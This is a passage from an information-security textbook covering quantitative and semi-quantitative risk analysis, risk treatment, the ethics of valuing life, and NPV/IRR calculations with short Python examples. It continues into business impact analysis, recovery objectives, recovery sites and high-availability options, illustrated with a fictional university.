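A minimal sketch of formula (4.3), reproducing the building-fire example; the once-in-50-years ARO used in the last line is an assumed figure for illustration, not from the text:

```python
# Formula (4.3): SLE = Asset Value x Exposure Factor.
def sle(asset_value: float, exposure_factor: float) -> float:
    return asset_value * exposure_factor

# A $1M building reduced to its $200K land value: EF = 80%.
print(sle(1_000_000, 0.80))         # 800000.0 -> SLE = $800,000

# Combined with (4.2), under an ASSUMED fire ARO of 0.02 (once in 50
# years), the ALE would be $800,000 x 0.02 = $16,000/year.
print(sle(1_000_000, 0.80) * 0.02)  # 16000.0
```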

Challenges with a Quantitative Analysis include [8]:
1. Unknown statistics. Determining an appropriate likelihood and (in some cases) impact is difficult. Since crackers do not announce themselves, many organizations do not know if or how many attackers have already broken into their networks. Smaller organizations often lack sufficient security expertise or staff to recognize attackers, or to estimate the likelihood of an attack. For accurate statistics, companies often hire risk consultants. Experts can rate the effectiveness of specific security devices, such as specific firewalls, in countering attacks.
2. Complex costs. Risk impacts may be counted two or three times if done improperly. For example, if a hacker breaks into both the registration and grades databases, we are liable only once for FERPA.
3. Security hides risk. When implemented well, users get the impression that security is not an issue. How can you estimate the benefits of security, when you are not paying the risks' costs because sufficient security is in place?

A Semi-Quantitative Risk Analysis method is a half-way measure between Qualitative Analysis and Quantitative Analysis [9]. While it cannot estimate risk costs, it can rank risks, enabling their prioritization. This technique rates threats with (for example) five levels of impact and five levels of likelihood, as shown in Fig. 4.5. Each level may be given a meaning [1]. The Impact ratings could be defined as follows: Insignificant: no meaningful impact; Minor: impacts a small part of the business; Major: impacts company brand; Material: requires external reporting; and Catastrophic: failure or downsizing of the company. Each impact rating should also have an associated cost range. The Likelihood ratings could be defined as, e.g.: Rare: very unlikely to occur; Unlikely: not encountered within the last 5 years; Moderate: occurred in the last 5 years; Likely: occurred in the last year; Frequent: occurs multiple times per year.

Fig. 4.5 Semi-quantitative risk analysis. A 5 × 5 matrix with Likelihood on the horizontal axis (Rare (1), Unlikely (2), Moderate (3), Likely (4), Frequent (5)) and Impact on the vertical axis (Insignificant (1), Minor (2), Major (3), Material (4), Catastrophic (5)); cells grade from Low through Medium and High to Severe along the diagonal

Risks that fall into the red cells are most critical, while those falling into the green cells are least serious. A risk priority is calculated by multiplying the Impact and Likelihood ratings, and sorting the results for high numbers:

Risk Priority = Impact × Likelihood (4.4)
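A minimal sketch of formula (4.4) in Python; the example risks and their 1–5 ratings are hypothetical:

```python
# Rank risks by Impact x Likelihood, each rated on a 1-5 scale.
risks = {
    "Hacker penetration": {"impact": 4, "likelihood": 3},
    "Stolen laptop":      {"impact": 2, "likelihood": 4},
    "Flood":              {"impact": 5, "likelihood": 1},
}

# Sort so the highest-priority risks are addressed first.
for name, r in sorted(risks.items(),
                      key=lambda kv: kv[1]["impact"] * kv[1]["likelihood"],
                      reverse=True):
    print(f"{name}: priority {r['impact'] * r['likelihood']}")
# Hacker penetration: priority 12
# Stolen laptop: priority 8
# Flood: priority 5
```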


4.1.5 Step 5: Treat Risk

All risk analysis techniques used in Step 4 provide at least a prioritization of risks, which helps in determining the threats to be addressed. Quantitative Risk Analysis, in addition, provides a financial value that indicates how much to spend on controls. Each risk should be addressed using one of the following risk treatment types:

Risk Acceptance: It is possible to ignore a risk, if the risk exposure is negligible; any arising problem is handled as necessary. E.g.: a snowstorm in Florida.
Risk Avoidance: Stop doing the risky behavior altogether, such as eliminating the use of Social Security Numbers, and avoiding storage of payment card numbers.
Risk Mitigation: Implement control(s) that minimize the vulnerability. Two approaches include minimizing likelihood and minimizing impact [1]. Teaching security awareness and using a firewall and antivirus software would minimize likelihood, while developing an Incident Response Plan would minimize the impact of an attack.
Risk Transference: Pay someone to assume the risk for you, such as purchasing insurance against the threat. This category is recommended for low-frequency, high-cost risks. While insurance can transfer the financial impact, it cannot transfer legal responsibility (which you retain).

Controls help to mitigate risk. There are many types of controls, and combining or layering controls is most effective. Controls can be preventive, detective or corrective, as mentioned in Chap. 2, although preventive controls are preferable. Additional types of controls include deterrent, compensating, and countermeasure controls [10]. Deterrent controls discourage people from deviant behavior; an example would be a policy of firing and/or prosecuting people for security violations or crimes. A compensating control is used as a weaker alternative when the recommended control is infeasible; an example might be the logging of critical employee transactions when segregation of duties is not possible. Finally, countermeasures are targeted controls, which address specific threats. An example is to use a router in combination with a firewall to counter high-volume IP packet attacks; the 'border' router (i.e., the router at the border to the internet) can discard the obvious attack packets, while the firewall carefully screens the remaining packets.

After a full implementation of controls, some residual risk remains. Figure 4.6 demonstrates that this residual risk should be a fraction of the original risk. A partial solution for Einstein University is shown in Table 4.8. In this table, the risk and ALE are copied from the previous step in Table 4.7. Controls are considered and priced. If you are new to security, selecting and pricing controls may be difficult. For now, consider that specific controls can include technology controls (e.g., firewalls, antivirus software, access control), administrative controls (e.g., security policies, procedures, training), and physical controls (e.g., locks, guards, keycards). Completing this task will be easier after learning about and working with security controls in the other chapters. Security is a system: if you are doing it right, you will be tweaking your work across chapters as you learn more about your business and security.


Fig. 4.6  Residual risk after treatment

Table 4.8  Analysis of risks versus controls (workbook exercise)

Risk                             | ALE Score                | Control                                                            | Cost of Control
Stolen Faculty Laptop            | $2K or $10,000 (FERPA)   | Encryption                                                         | $60/device
Registration System Disk Failure | $8,400                   | RAID (redundant disks)                                             | $750
Registration Hacker Penetration  | $135,200 (max $740,000)  | Unified Threat Mgmt: firewall, log monitoring, network monitoring  | $1K
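The comparison behind Table 4.8 is simple arithmetic: a mitigating control is financially justified when its annual cost is less than the reduction in ALE it is expected to deliver. Below is a minimal Python sketch; the 90% reduction fraction is an illustrative assumption, not a figure from the table.

def control_worthwhile(ale, annual_control_cost, risk_reduction):
    """True when the control costs less per year than the ALE it removes.

    risk_reduction is the fraction of the ALE the control is expected
    to eliminate (an estimate, like the ALE itself).
    """
    return annual_control_cost < ale * risk_reduction

# Registration disk failure from Table 4.8: ALE $8,400, RAID at $750/year
print(control_worthwhile(ale=8400, annual_control_cost=750,
                         risk_reduction=0.9))   # True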

Forensic statistics show that 78% of all intrusions may be rated as 'low difficulty' [16]. In other words, the victim organizations were easy targets. Doing a good job of implementing security, including acting on risk management plans and the other chapters in this book, should make an organization safer, at least from the easy attacks.

4.1.6 Step 6: Monitor (and Communicate) Risk

As your business, the industry, and the world change, your organization's risk profile will also change [10]. You will learn more about the costs and likelihoods of risk as you experience threats. Automated controls may provide better insight, by tracking security threats.


Table 4.9  Sample risk scoreboard

Issue              | Status                                       | Estimated Cost of Threat
Incident Response  | Procedure being defined – incident response  | $5,000
Stolen Laptop      | In investigation                             | $2,000, legal issues
Cost overruns      | Internal audit investigation                 | $10,000
Security Awareness | Training completed                           | $500

Management should monitor their organization's risk profile regularly, including the status of control implementations and compliance audits. Since people tend to avoid discussing risk, the topic must be regularly brought up with appropriate levels of management [7]. Table 4.9 demonstrates a report that informs management of ongoing issues. It is a color-coded risk scoreboard or dashboard, which uses the stoplight colors: red for serious threats, yellow for lower-priority threats, and green for threat resolution. For each issue, the report includes a color indicating the overall status, a brief description, and an approximate cost. The report is summarized, since senior managers do not need all the technical details. In this table, a flaw in physical security was fixed by training the personnel involved; that issue has been resolved and will not appear in the next report. Some cost overruns are being investigated; these issues are underway. Finally, a laptop has been stolen and a new procedure for FERPA incidents is needed; those are new issues for which remediation is about to begin.

The Risk Assessment process has two main benefits. One benefit is to control costs when disaster strikes, as it inevitably does. Another benefit is in regulatory compliance. In the United States, judges in civil and criminal courts expect organizations to protect themselves and their clients using risk assessment. Due Diligence is the responsibility of doing careful risk assessment. Due Care is the follow-up responsibility of implementing recommended controls from the risk assessment process. Liability is minimized if reasonable precautions have been taken [10].

4.2 The Ethics of Risk

The original purpose of risk management was to ensure that an organization did not jeopardize its existence or security by making very poor decisions. This perspective is a subjective one, meant to protect the organization itself. In the example of a school shooting (Table 4.1), a student's life is not valued sufficiently highly, since from the school's perspective the loss of income is only from tuition. According to traditional risk assessment techniques for deriving the maximum cost of controls, the school could consider a student's life equivalent to the cost of lost tuition (assuming lawsuits are not likely to occur, unless there is obvious negligence).


While this example is not specifically about information security, it could apply to such cases when someone's identity, health, or privacy is affected. Three cases involving technology where risk analysis affected human life demonstrate poor decisions made for economic or political reasons [10]. First, the night before the doomed Challenger space shuttle launch, one executive told another: "Take off your engineering hat and put on your management hat." Second, the value of human life is sometimes related to projected income, which unfairly penalizes people in developing nations. In Bhopal, India, where a chemical leak killed nearly 3000 people, the value of life was estimated so low that the settlement was less than half of the Exxon Valdez oil spill's settlement. Third, from a risk perspective, the Three Mile Island nuclear disaster was a 'success' in that no lives were lost; however, public acceptance of nuclear technologies eroded due to the ensuing environmental problems and the demonstrated threat nuclear energy posed. These three cases show that it is easy to underestimate the cost of others' lives when your own life is not impacted.

Ethical considerations include that human rights are natural or 'God-given' rights, which apply equally to all. W. D. Ross proposed that we have a duty to not harm others physically or psychologically, which means we should avoid harming someone's health, security, intelligence, character or happiness [11]. This view of risk holds that an organization should try to do good to others. While it is not possible to eliminate all risk, considering your customers' or clients' perspectives is a worthy goal. This can occur by including the public in evaluating the risks related to these decisions [11]. In the case of the school shooting, it is first recognized that the school is not responsible for taking the life of the student(s), since the shooter did. However, an ethical school board would attempt to protect students and staff during risk assessment by taking the societal perspective and considering the possibility of losing a number of human lives. Studies on the 'Value of Life' consider that people demand more pay for risky jobs, and extrapolate to estimate that a life is worth between $2 million and $8 million in 1984 dollars [12]. Using these values as asset losses in Quantitative Analysis is certainly more reasonable than using the value of tuition. Ethical risk is described in more detail in Chap. 20.

4.3 Advanced: Financial Analysis with Business Risk

Three financial analysis techniques may help during quantitative risk analysis: cost-benefit analysis, net present value, and internal rate of return. These terms are commonly used by business management and can be used to make the financial case to management for spending money on controls.

Cost-Benefit Analysis: Implementing security controls has a financial cost, but should result in a reduction in financial loss.


This reduction in expenditures can be described as potential benefits. To simplify a cost-benefit analysis, consider that in Year 0 we purchase the control (a cost, −C0). In subsequent years, we incur reduced expenses (+Y1, +Y2, …), calculated by comparing our costs before implementing the control with our estimated costs after [13]. Thus, a simplified cost-benefit analysis (SCBA) indicates the total value of a security control over its lifetime, and is calculated as:

SCBA = −C0 + Y1 + Y2 + Y3 + …  (4.5)



If the SCBA results in a positive answer, the organization saves money by spending money on the control. A zero or negative answer indicates a break-even or a loss, respectively. However, this answer is simplified, since financial analysis assumes that money today is worth more than the same monetary value in the future. Therefore, we need to discount future earnings in order to determine a financial estimate in today's money (called present value). The Net Present Value (NPV) is then calculated by summing each return for year t, Rt, discounted using an interest rate, i, often estimated at 10% [14]. This is shown in Eq. 4.6, where the original cost is specified as a negative R0 and subsequent reductions in expenses are positive.

NPV = Σ (t = 0 to N) Rt / (1 + i)^t = R0 + R1/(1 + i) + R2/(1 + i)^2 + R3/(1 + i)^3 + …  (4.6)

The NPV determines the value to us today of implementing a security control. What if we have a number of potential investments, and we want to determine which is the best? An Internal Rate of Return (IRR) provides a rate indicating how much each investment will pay off: the higher the rate, the higher the payoff. Equation 4.6 is also used to calculate the IRR; however, instead of knowing i and calculating NPV, we set NPV to zero and solve for the rate, i. As an example, suppose encryption software costs $35 per license and we have 100 laptops with confidential data, and our estimated savings in risk for this investment is $1000 per year for 5 years. Table 4.10 shows the annual calculations, using a discount rate of 10%. The NPV sums to $290.78, and the IRR is approximately 13.2% (as computed, for example, with the IRR() function in Excel).

Table 4.10  Calculations of NPV

Year  | $ Value | Present value
0     | −3500   | −3500.00
1     | 1000    | 909.09
2     | 1000    | 826.45
3     | 1000    | 751.31
4     | 1000    | 683.01
5     | 1000    | 620.92
Total | 1500    | 290.78
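The arithmetic in Table 4.10 is easy to reproduce. Below is a minimal Python sketch of Eq. 4.6 applied to the encryption example; the bisection-based IRR solver is one simple way to 'set NPV to zero and solve for i', under the assumption that NPV falls as the rate rises.

def npv(rate, cashflows):
    """Net Present Value per Eq. 4.6; cashflows[0] is Year 0 (the purchase, negative)."""
    return sum(cf / (1 + rate) ** t for t, cf in enumerate(cashflows))

def irr(cashflows, lo=0.0, hi=1.0, tol=1e-7):
    """Solve NPV(rate) = 0 by bisection; assumes NPV is positive at lo, negative at hi."""
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if npv(mid, cashflows) > 0:
            lo = mid
        else:
            hi = mid
    return (lo + hi) / 2

flows = [-3500, 1000, 1000, 1000, 1000, 1000]   # the Table 4.10 example
print(round(npv(0.10, flows), 2))   # 290.79 (Table 4.10's 290.78 rounds each year first)
print(round(irr(flows) * 100, 1))   # 13.2 (percent)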


4.4 Advanced: Risk for Larger Organizations

Larger organizations may have a more formalized risk process, and security personnel should be aware of it. The NIST risk assessment methodology includes more stages, with specified, documented inputs and outputs, as shown in Fig. 4.7. Previous history can help considerably with generating an accurate likelihood. This can be achieved by using a well-selected set of metrics or statistics. Quantifiable metrics should be collected periodically and inexpensively, preferably in an automated way. An example metric might be: how many virus infections does the help desk report per month? A baseline is a measurement of performance at a particular point in time. Using consistently measured data, it is possible to observe changes in the metrics over time, discover trends for future risk analysis, and measure the effectiveness of controls. Risk management should occur at the strategic, project and operational levels [10]. At each level, risk assessment should be consistent with higher levels and related risk assessments. Each level should also consider the details associated with the scope or project at hand, such as a specific software development project [15]. Regardless of level, the scope of the risk project is carefully selected to cohesively focus on, and properly cover, a defined area or product. A Risk Assessment Report is the final output. This report ensures that security controls were tested and passed inspection. The product or area is then certified for use.

Fig. 4.7  NIST risk assessment methodology. Each activity takes documented inputs and produces documented outputs, proceeding through: System Characterization, Identify Threats, Identify Vulnerabilities, Analyze Controls, Determine Likelihood, Analyze Impact, Determine Risk, Recommend Controls, and Document Results, culminating in the Risk Assessment Report.


Risk assessment requires business and security people to work together closely. Governance and senior management are responsible for making decisions concerning risk, allocating resources for controls, and evaluating risk assessment results. An Information Security Manager is responsible for coordinating the risk process and developing the risk management plan. The business side is responsible for prioritizing assets and helping to define and implement controls for business processes. Business roles include: Process Owners, who make decisions concerning securing the business process, and Information Owners, who ensure controls are in place to address CIA, including signing off on permissions for access to business data. On the security side, security practitioners design security requirements and implement controls into IT systems, networks, and applications, while Security Trainers develop training materials for security, and educate employees as to security practices. The Chief Information Officer (CIO), as the head IT person, manages IT plans and budgets and works closely with the Information Security Manager. These two roles are preferably separate, since CIOs tend to focus on managing IT processes, whereas the security manager focuses on security – a full-time job at any sizeable institution.

4.5 Questions and Problems

1. Vocabulary. Match each meaning with the correct word: Vulnerability, Residual risk, Threat, Qualitative risk analysis, Risk mitigation, Risk assessment, Risk management, Risk avoidance, Risk transfer, Threat agent, Annual loss expectancy, Single loss expectancy, Annual rate of occurrence, Quantitative risk analysis.

(a) A method of eliminating risk by stopping risky behavior.
(b) A method of addressing risk by adding controls to minimize risk exposure.
(c) The financial loss accruing from one risk incident occurring.
(d) The remaining level of risk, after risk controls are implemented.
(e) A risk term addressing the enabling of a risk. Examples include: disgruntled employee, insufficient staff, poor documentation.
(f) A risk term addressing a potential risk problem. Examples include: severe weather, vandalism, fraud, malware, phishing.
(g) A method of determining risk priority, by using gut feel.
(h) A term denoting the full risk process, including risk planning, determination, treatment and monitoring.

2. Risk Lifecycle. Your large organization averages 20-some malware infection reports a month. What might be done in each stage of the Continuous Risk Management Process (shown in Fig. 4.2) to reduce malware infections?


3. Assets and Threats. In your selected industry/major/specialty, list what you believe are the top 5 assets and top 5 threats. (If you are in the IT field, instead select an industry you may choose to work in, e.g., health, manufacturing, finance, retail, entertainment, education, hotel, …)

4. Qualitative Risk Analysis. Perform a Qualitative Risk Analysis, using a Vulnerability Assessment Quadrant Map, for your selected industry/major/specialty. Assume this organization is in your home town. Include the most important threats or threat categories listed in Step 2. Hint: Work with a copy of the Vulnerability Assessment Quadrant Map, provided in the Security Workbook.

5. Quantitative Risk Analysis. Complete a Quantitative Risk Analysis Table for five major threats in your industry/major/specialty. Find estimates for four asset values and/or likelihoods via searches on the Internet, and document these values, as well as the websites where you found them. Do your best at guessing remaining asset values and likelihoods. Show resulting ALE values.

6. Selecting Controls. For five major threats in your industry/major/specialty, discuss whether you would use risk avoidance, mitigation, transference, or acceptance for each, and why. Discuss a possible control for each, and describe whether the control is preventive, detective, or corrective.

7. Considering Ethics. In your industry/major/specialty, can you define an area where traditional risk assessment, with its focus on minimizing costs to the owner only, might be unethical? Describe the scenario, and how you might implement a risk strategy that protects all involved.

4.5.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study     | Health First case study | Other resources
Analyzing risk | ✓                       | Security Workbook

References

1. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights
2. IBM (2021) Cost of a data breach report 2021. IBM Security, Armonk
3. IBM (2022) Cost of a data breach report 2022. IBM Security, Armonk
4. Ponemon Institute (2014) 2014 cost of data breach study: United States. Ponemon Institute LLC, May
5. Verizon (2022) 2022 data breach investigations report. http://www.verizon.com
6. ISACA (2013) CRISC™ review manual 2013. ISACA, Arlington Heights
7. Gibson D (2011) Managing risk in information systems. Jones & Bartlett Learning, Burlington, pp 392–418
8. Pinto CA, Arora A, Hall D, Schmitz E (2006) Challenges to sustainable risk management: case example in information network security. Eng Manag J 18(1):17–23
9. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 101–104
10. Herkert JR (1994) Ethical risk assessment: valuing public perceptions. IEEE Technol Soc Mag 13(1):4–10
11. Asiata L-AB (2010) Technology, individual rights and the ethical evaluation of risk. J Inf Commun Ethics Soc 8(4):308–322
12. Kahn S (1986) Economic estimates of the value of life. IEEE Technol Soc Mag 5(2):24–31
13. Gibson D (2011) Managing risk in information systems. Jones & Bartlett Learning, Burlington, pp 101–102
14. Subramanyam KR, Wild JJ (2009) Financial statement analysis, 10th edn. McGraw-Hill Irwin, New York, pp 40–43
15. NIST (2012) NIST special publication 800-30: guide for conducting risk assessments, rev 1. National Institute of Standards and Technology, U.S. Dept. of Commerce
16. Verizon (2013) 2013 data breach investigations report. http://www.verizonenterprise.com

Chapter 5

Addressing Business Impact Analysis and Business Continuity

It’s all fun and games when we are stealing each other’s money. When we are messing with a society’s ability to operate, we can’t tolerate it. – Sue Gordon, a former principal deputy director of national intelligence, speaking about the need to deter ransomware criminals, such as when targeting critical infrastructure: the Colonial Pipeline [1].

Consider a pharmacy with a failed centralized computer system. A person needs a critical prescription refilled immediately. His 24-hour pharmacy's computer system is down, and because it sits within a centralized network, other stores in the chain also lack his prescription information. The doctor's office is closed. This person's choices are visiting a hospital, hoping computer service resumes, or (at best) being miserable all night. This IT failure impacts the organization's sales and reputation, and may affect human life.

This chapter is about Availability, or the lack of it: what happens to a business when the computer systems fail or cannot operate? Business Impact Analysis (BIA) determines how an IT disruption would affect an organization, including the financial, legal, liability, and reputation aspects, and sets business goals to minimize disruption. Business Continuity (BC) is about how 'business continues' in the face of IT disruption, and selects the controls that should be used to achieve the Availability goals set in the BIA. The Disaster Recovery Plan is the detailed IT plan to provide a backup system when normal operation has failed. These topics usually have a direct impact on profitability, since loss of IT often leads to additional expenses and/or loss of business profit. After the plan is in place, it must be tested. Figure 5.1 shows the steps taken in this chapter.

5.1 Business Impact Analysis

IT outages will definitely occur. They may occur due to system failures (server, network, or disk failure), external/weather events (storms, tornado, earthquake, fire, electrical failure), hacker attack (malware, Distributed Denial of Service, penetration), and employee negligence or fraud (incompetence, error, revenge). The Business Impact Analysis is a document that considers the impact of IT failure on the business, how to minimize such failures, and which business processes should be prioritized when resources are limited.


Fig. 5.1  Stages in business continuity

What adversities could occur? What impact could an IT outage have on the organization financially? Legally? On human life? On reputation? Which business processes are of strategic importance? What is the necessary recovery time period? Key business managers should provide input regarding important business processes, potentially via meetings, interviews, and questionnaires.

5.1.1 Step 1: Define Threats Resulting in Business Disruption

The first step in creating a Business Impact Analysis is to define problematic incidents or events that could occur. Disruptive events can be classified by the damage that is incurred and may be defined by the duration of downtime of critical business applications. Event Damage Classifications may include [10]:

Event damage classification                                                          | Actions
Crisis: Has a major material or financial impact on the business                    | Alert senior management (and regulatory agencies if appropriate)
Major: Impacts one or more departments and may impact outside clients               | Alert senior management
Minor: A non-negligible event with no material or financial impact on the business  | Correct and log
Negligible: No significant cost or damage (e.g., short-term operating system crash) | Log

Table 5.1 shows an example impact classification for a university. In further BIA work, Negligible events can be ignored. However, Minor, Major, and Crisis events should be documented and their repairs tracked.


Table 5.1  Event damage classification for disruptive events (workbook exercise)

Problematic event or incident | Affected business process(es)    | Impact classification & effect on finances, legal liability, human life, reputation
Fire                          | Classrooms, business departments | Crisis; at times Major. Human life
Hacking intrusion             | Registration, advising           | Major. Legal/liability: FERPA, PCI DSS
Network unavailable           | Registration, advising, classes  | Crisis during school year
Social engineering/fraud      | Registration                     | Major. Legal liability: FERPA, PCI DSS
Server failure (disk/server)  | Registration, advising, classes  | Major; at times Crisis
Loss of cloud                 | Learning management              | Crisis during school year; Major at other times
Server room                   | Classes, registration            | Crisis, but applications are prioritized by month
Power failure                 | Classes, all business processes  | Crisis during school year; Major at other times

Fig. 5.2  Recovery timeline

When an IT or other disruption occurs, a prepared business implements an Alternate Mode, which is the set of business practices where some critical subset of service continues via a backup system (IT or otherwise). Less critical operations may be postponed, performed manually, or left to languish during this time. Figure 5.2 demonstrates how this occurs. Time proceeds from left to right. The regular service is interrupted by an unfortunate event. No service is provided during the Interruption Window, until the Disaster Recovery Plan is implemented to guide the transition to Alternate Mode [2]. Alternate Mode offers a lower level of critical business service, until problems can be resolved. The Restoration Plan helps to resolve critical issues and guide IT toward the resumption of regular service.


Fig. 5.3  Organizational priorities for alternate mode. A corporate hierarchy in which departments (e.g., Sales (1), Shipping (2), Engineering (3)) and their services and products (e.g., Web Service (1), Orders (1), Sales Calls (2), Inventory (2), Products A-C (1-3)) are each assigned a priority rank.

5.1.2 Step 2: Define Recovery Objectives

The next step in the BIA process is to identify which services cannot tolerate disruption and loss of transactions. The Service Delivery Objective (SDO) is the selected level of service for Alternate Mode [2]. Business expertise is required to determine the desired level of service during Alternate Mode. Figure 5.3 shows a hypothetical business scenario, where certain aspects of the organization (e.g., certain web sites, service departments, business departments) are ranked at higher priority than others. High-priority IT processes will resume service in Alternate Mode, whereas lower-ranked services' resumption may be postponed. Maximum Tolerable Outage is the maximum time the business can endure staying in Alternate Mode. It is important to define what the maximum interruption window should be for each high-priority service. The Recovery Time Objective (RTO) is the preferred duration of time between interruption and Alternate Mode implementation for each service. How long can your organization survive this service being down? This decision can depend on financial profit, liability, reputation, and other factors.

Major issues can result if transactions are completed but are later lost, due to lack of backup. For example, customers may have paid for products, but before they are shipped, the organization loses the transactions. A second example: you deposit money into a bank, but the deposit is lost. Lost data can occur when a disk fails or is destroyed, or when a laptop or memory is lost or stolen, and there is no recent backup. The Recovery Point Objective (RPO) determines the amount of transaction data you can afford to lose if your server's disk system fails. If you perform a backup of your main databases daily, the most data you will lose is 1 day. If you do weekly backups, you may lose 5-7 days of data. Some services cannot afford to lose any information following a disk/system failure, and should have an RPO of 0 hours (h).


Fig. 5.4  Recovery time objective and recovery point objective. The RPO measures lost or 'orphan' data from before the interruption (one week, one day, one hour), while the RTO measures lost processing time after the interruption (one hour, one day, one week).

Table 5.2  Partial BIA summary for university (workbook exercise)

Business process     | RPO    | RTO  | Critical resources (computer, people, peripherals) | Special notes (unusual treatment at specific times, unusual risk conditions)
Registration         | 0 h    | 4 h  | Registration DB, network, registrar                | High priority during Nov-Jan, March-June, August
Personnel            | 2 h    | 48 h | Personnel DB                                       | Can operate manually for 2 days with loss of capability
Teaching             | 1 day  | 1 h  | Learning management, network, faculty files        | During school semester: high priority
University web pages | 1 week | 1 h  | Web server                                         | Always critical RTO

If, for example, a computerized doctor's office lost 1 day's worth of doctor's notes, the doctor would lose critical prescription and patient health information that he or she would likely not remember. A sales organization cannot afford to lose any critical orders. Any lost data is called Orphan Data. The best way to minimize orphan data is frequent backups to an alternate disk, system, or tape: if the desired RPO is 1 day or 1 hour, then backups should occur at least that frequently. Figure 5.4 shows how the RTO measures losses due to service downtime after the interruption, whereas the RPO measures lost transaction history for some amount of time in the past (i.e., since the last backup). For both, shorter RTO/RPO values mean a smaller loss of processing time or data, which is the preferred scenario. Table 5.2 shows a partial workbook analysis of RTO and RPO for a university. In this example, note that some functions, Registration and Teaching, vary in their criticality during certain parts of the year. Also, in some cases having a low RTO is more important than a low RPO, and vice versa.


The RTO decisions can help to categorize data into one of four Criticality Classes, each with an associated preferred RTO. For example, the Vital class's 'short time' may be 1 day or 5 days, depending on organizational needs [10].

• Critical: Cannot be performed manually. Tolerance to interruption is very low.
• Vital: Can be performed manually for a short time.
• Sensitive: Can be performed manually for a period of time, but may cost more in staff.
• Nonsensitive: Can be performed manually for an extended period of time with little additional cost and minimal recovery effort.

Information in the Critical and Vital classes is considered sufficiently important that it should be addressed by the Business Continuity process. We will also use this classification data in the later chapter on Information Security.

5.2 Step 3: Business Continuity: Plan for Recovery

Business Continuity is the business plan to offer critical services in the event of a disruption. The Business Continuity Plan (BCP) is the detailed plan that takes the BIA results and describes how business should continue when a disaster strikes, covering business continuity of operation and business resumption. It also includes the systems covered, personnel responsibilities, contact information, a transportation plan, an evaluation plan, and an emergency relocation plan. The Disaster Recovery Plan (DRP) is the detailed IT plan/procedure to guide IS systems recovery to Alternate Mode after an incident occurs. Both plans should be tested, preferably at an off time, such as a weekend [10].

Different technical solutions can help to achieve different RTO and RPO values, including high-availability solutions, recovery sites, and cloud solutions. This section evaluates these alternatives. An organization should attempt to minimize its losses following an IT failure by never paying more for recovery than is lost in income due to the failure; minimal loss is achieved when the price of recovery matches the lost income. Types of recovery can be classified, and backup facilities vary in cost depending on the configuration and access agreement. Options include [2]:

• Mirror Site: High availability using a remote site provides redundancy and continual transaction backup.
• Hot Site: The backup site is fully configured with equipment and networks. Software needs to be reloaded, but the site can be operational in hours.
• Warm Site: The backup site usually has network and disk drives, but may lack sufficient servers for immediate use.
• Cold Site: This backup site has electrical wiring and air conditioning, but no IT network or other equipment. It may take weeks to fully configure.


5.2.1 Recovery Sites

As part of the BIA process, the Recovery Time Objective and Service Delivery Objective are carefully considered to decide which services should be brought up in Alternate Mode and how quickly. A recovery site solution does not utilize active redundancy, but instead a backup plan: if a first site fails, a planned second site is configured and brought up. The recovery (RTO) can take hours, days, or weeks. Backup sites can exist within a sizeable organization, between cooperating organizations, or with a commercial backup site provider. Here are some options [2]:

Cloud Services: Cloud services can be configured to host data with redundancy as a recovery or mirrored site, and can serve as a backup or mirror site if data is hosted internally. The chapter on Alternative Networks discusses cloud implementations.

Duplicate Information Processing Facility (IPF): Your organization has two sites or subsidiaries. Processing normally occurs locally, but could occur remotely if the local site failed. This technique can operate as a recovery site or a mirrored site.

Reciprocal Agreement: Your organization has an agreement with another organization that enables either of you to use the other's IT facilities if your own fail. This option comes with additional issues such as quick access, security, IT compatibility, limited processing resources, priority, and the other common issues that arise when attempting to live with strangers. It is recommended to test in advance of a failure, and to contractually agree on the access mechanism and maximum duration for such a combined living arrangement.

Mobile Site: A trailer can be brought to your site to serve as a hot or warm site. The trailer may be pre-configured with satellite or microwave communication links.

Einstein University uses in-house IT for vital and major applications, but a cloud service for 24/7 critical applications, such as learning management. Table 5.3 on RPO Controls lists the RPO value for each business process (taken from Table 5.2) and describes how the RPO is attained in the Special Treatment column. High-priority Critical and Vital business processes are further elaborated in Table 5.4, which includes the required procedures and documents to support business continuity. These procedures should be written by technical staff in Section 5 of the Security Workbook.

5.2.2 High-Availability Solutions

High-availability solutions use redundancy to minimize failures, enabling an RPO and RTO of seconds or minutes. Figure 5.5 shows various high-availability options for processing, file services and networks. Needless to say, the in-house options may also be available in the cloud.


Table 5.3  RPO controls (workbook exercise)

Business process    | RPO    | Data file and system/directory location | Special treatment (backup period, RAID, file retention strategies)
Teaching            | 1 day  | Faculty servers & computers             | Faculty servers are backed up daily. Recommendation: when faculty use PCs, save files on both PC and server. Classes are cancelled during extreme weather (for student protection)
Learning management | 0 h    | Cloud                                   | Cloud system with mirrored redundancy
Registration        | 0 h    | Registration DB, data center            | RAID provides disk redundancy. Server is backed up daily, stored offsite. Use mobile site for outages >3 days
Personnel           | 2 h    | Personnel DB, data center               | RAID provides disk redundancy. Server is backed up daily, stored offsite. Use mobile site for outages >3 days
Web service         | 1 week | Data center                             | Server is backed up weekly, stored offsite

Table 5.4  Business continuity summary for critical and vital classes (workbook exercise)

Criticality class (critical or vital) | Business process | Incident or problematic event(s) | Procedure for handling (name the procedure if extended, describe steps if short)
Vital                                 | Registration     | Computer failure                 | DB backup procedure; DB recovery procedure – registration; mobile site plan
Critical                              | Teaching         | Computer failure                 | Cloud services with mirrored redundancy

Fig. 5.5  High availability options. Processing: active-active and active-passive clusters; file servers: RAID, storage arrays, and Big Data; network: diverse routing and alternate routing; any of these may also be hosted in the cloud.


A cluster is a set of servers running similar software, built to survive one (or possibly more) failures [10]. Clusters are used for processing, and within file systems and network equipment. An active-active cluster involves two or more processors processing different transactions simultaneously. Active-active clusters are used in load sharing, where two or more processors share the work; if one processor fails, another processor will recover its transactions. An advantage of this configuration is scalability, since servers can be added to help share an increased load. One requirement is that all servers in the cluster share storage. In an active-passive cluster, a passive processor takes over if the active processor fails. An advantage of this method is that the standby can be local or located remotely, and may have shared or replicated storage. Clusters can also span a city (metro-cluster) or the earth (geo-cluster), which may be beneficial for large organizations. Example solutions for disk systems and networks include [2]:

Redundant Array of Independent Disks (RAID): An array of disks supports redundancy, often via parity. If one disk fails, the remaining disks can deduce the missing information. This relatively inexpensive and popular disk solution is located at one site. If multiple disks fail (e.g., through fire, flood, theft, or bad luck), little recovery can be made, except by maintaining off-site backups.

